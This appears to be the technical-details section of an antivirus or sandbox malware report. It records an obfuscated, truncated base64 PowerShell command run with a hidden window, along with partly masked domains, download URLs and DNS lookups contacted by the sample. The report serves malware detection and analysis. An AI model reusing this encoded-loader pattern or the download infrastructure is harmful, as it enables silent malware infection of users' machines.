Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAHMAaABFAGwATABJAGQAWwAxAF0AKwAkAHMASABFAGwATABpAGQAWwAxADMAXQArACcAeAAnACkAKAAgAE4AZQB3AC0AbwBiAGoARQBjAFQAIAAgAEkATwAuAGMAbwBtAHAAcgBFAFMAUwBpAE8ATgAuAEQARQBGAEwAYQB0AEUAcwBUAH...
- 'av##omp.ru':80
- 'av##omp.ru':443
- 'is#####arlama.com.tr':80
- 'vi####m-life.net':80
- 'ad####uretext.com':80
- 'hu###omains.com':443
- 'k9##m.com':80
- http://av##omp.ru/I5Su4/
- http://is#####arlama.com.tr/JcEXH/
- http://www.is#####arlama.com.tr/JcEXH/
- http://vi####m-life.net/09WwlXT/
- http://ad####uretext.com/ifiy27v/
- http://k9##m.com/O4mj/
- 'av##omp.ru':443
- 'hu###omains.com':443
- DNS ASK av##omp.ru
- DNS ASK is#####arlama.com.tr
- DNS ASK vi####m-life.net
- DNS ASK ad####uretext.com
- DNS ASK hu###omains.com
- DNS ASK k9##m.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAHMAaABFAGwATABJAGQAWwAxAF0AKwAkAHMASABFAGwATABpAGQAWwAxADMAXQArACcAeAAnACkAKAAgAE4AZQB3AC0AbwBiAGoARQBjAFQAIAAgAEkATwAuAGMAbwBtAHAAcgBFAFMAUwBpAE8ATgAuAEQARQBGAEwAYQB0AEUAcwBUAH...' (со скрытым окном)